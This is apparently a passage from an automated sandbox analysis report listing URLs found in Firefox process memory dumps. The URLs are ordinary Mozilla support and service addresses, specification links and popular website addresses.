Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8613000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B861A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B861A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3333256582.000001A8B7089000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelC:
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000010.00000003.3106604957.000001A8B8EC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3269554186.000001A8B8EC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3251943364.000001A8B8EC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000010.00000003.3234228250.000001A8C3AAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3313236547.000001A8B3203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3330787150.000001A8B6F9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3273669972.000001A8B7ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000010.00000003.3209855011.000001A8B8FAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3168304243.000001A8B8F9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3276744565.000001A8B8FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3163900240.000001A8B8F71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000010.00000003.3241215258.000001A8BE3E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3266256409.000001A8BE3EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgwidget.use-xdg-desktop-portalhttps://truecolors.firefox.comaccount-connec
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp, 14287614-3088-4146-9848-cff2ed487ea7.tmp.17.dr String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3264282880.000001A8C31B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3124581300.000001A8B80E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3186917673.000001A8B80D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/media.videocontrols.picture-in-picture.urlbar-but
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3144000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000010.00000003.3096413806.000001A8C340A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3093326567.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3124581300.000001A8B80E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3186917673.000001A8B80D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchq=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
